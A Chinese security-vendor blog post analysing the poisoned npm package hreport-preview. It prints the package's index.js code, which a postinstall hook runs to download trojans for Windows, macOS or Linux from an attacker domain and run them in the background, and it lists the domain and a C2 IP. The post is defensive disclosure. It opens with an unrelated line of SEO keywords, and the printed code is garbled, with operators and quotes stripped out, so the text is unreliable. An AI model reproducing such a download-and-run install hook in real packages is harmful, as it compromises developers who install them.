临夏市建设局网站,常用网站开发软件,唯艾迪 wordpress,互联网创业项目拒绝割韭菜背景
2023年8月14日晚#xff0c;墨菲安全实验室发布《首起针对国内金融企业的开源组件投毒攻击事件》NPM投毒事件分析文章#xff0c;紧接着我们在8月17日监控到一个新的npm投毒组件包 hreport-preview#xff0c;该投毒组件用来下载木马文件的域名地址竟然是 img.murphys…背景
2023年8月14日晚墨菲安全实验室发布《首起针对国内金融企业的开源组件投毒攻击事件》NPM投毒事件分析文章紧接着我们在8月17日监控到一个新的npm投毒组件包 hreport-preview该投毒组件用来下载木马文件的域名地址竟然是 img.murphysec-nb.love(如下图1)且该域名注册时间就是8月14号投毒者使用的注册邮箱同样是hotmail临时注册的邮箱很显然大概是上次被我们公开投毒行为的攻击者正在火速赶往中路与我们对线大哥速度要不要这么快 -_-! 图1whois查询
当天中午我们还收到位于大洋彼岸漂亮国科罗拉多州、同样关注此事的软件供应链安全创业公司phylum.io CTO Louis来信见图2询问该投毒组件是否是我们所为很是尴尬。 图2phylum来信询问投毒包情况 投毒事件分析
8月17日上午7点墨菲安全实验室监控到用户 rowebrighttix(邮箱Rowe_Brighttixhotmail.com)向NPM上传了携带远控木马的NPM组件包 hreport-preview见图3。 图3: NPM仓库 hreport-preview 组件包
Readme中标题为Integrate common functions(集成公共功能) 而下方列举的常用函数名来自于一篇中文文章见图4因此投毒者大概率有中文背景。 图4《56个JavaScript 实用工具函数助你提升开发效率》文章中提及相关函数名 代码分析
当用户安装组件包时会执行 package.json 中的 postinstall 语句 node index.js进而针对Windows/Mac/Linux系统分别从以下网址下载恶意木马该木马会与投毒者的C2服务器(如152.195.38.76)建立远程连接进而执行恶意命令、上传/下载文件等操作疑似被攻防演练的红队所利用 https://img.murphysec-nb.love/w_x32.exe https://img.murphysec-nb.love/m_arm https://img.murphysec-nb.love/l_x64 //index.js 下载恶意木马
//......function check(){(async () {const result await getip();if (result){let status false;let donwoload const platform os.platform();const arch os.arch();if (platform win32) {if (uptimeMinutes.toFixed(2) 10){donwoloadhttps://img.murphysec-nb.love/w_arch.exestatus true}} else if (platform darwin) {if (uptimeMinutes.toFixed(2) 10){donwoloadhttps://img.murphysec-nb.love/m_archstatus true}} else if (platform linux) {donwoloadhttps://img.murphysec-nb.love/l_archawait (async () {const result await checkCgroup();if (result) {status true} else {if (uptimeMinutes.toFixed(2) 10){status true}}})();} else {return}if(status) {await (async () {const result await downloadAndSaveFile(donwoload);if (result !null){if (platform linux ||platform darwin ){addExecutablePermission(result)}runInBackground(result)}})();}else {process.exit(0);}}})();} IOC 参考链接 https://mp.weixin.qq.com/s/_bYduwlqMT3P5xQbtwg3FA https://www.npmjs.com/package/hreport-preview https://juejin.cn/post/7019090370814279693 排查工具及投毒情报
墨菲安全提供产品可实时拦截针对开源组件的投毒
墨菲安全的私有源网关产品可对npm、pip、maven等中央仓库的投毒事件进行实时的检测和拦截同时支持对高危漏洞实现基线管理目前该产品已在蚂蚁、小米、中国电信、中国移动等数十家客户落地应用。
墨菲安全提供实时的开源组件投毒情报预警可订阅
墨菲安全0day漏洞及投毒情报覆盖最新的0day、1day及投毒情报预警所有情报经过严格的安全专家研判保障企业获取的第一手的高质量漏洞及投毒情报更有比CVE漏洞库多25额外的详细分析字段目前该产品已在蚂蚁、美团、中国电信等数十家客户落地应用。 以上功能企业可通过以下方式申请试用
一、长按二维码申请 二、访问申请链接
https://murphysec.feishu.cn/share/base/form/shrcny75AEBuEJpL8myuAKPfsPe
